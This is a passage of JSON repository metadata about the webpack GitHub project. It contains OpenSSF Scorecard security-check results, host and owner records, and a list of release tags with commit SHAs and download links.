uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.e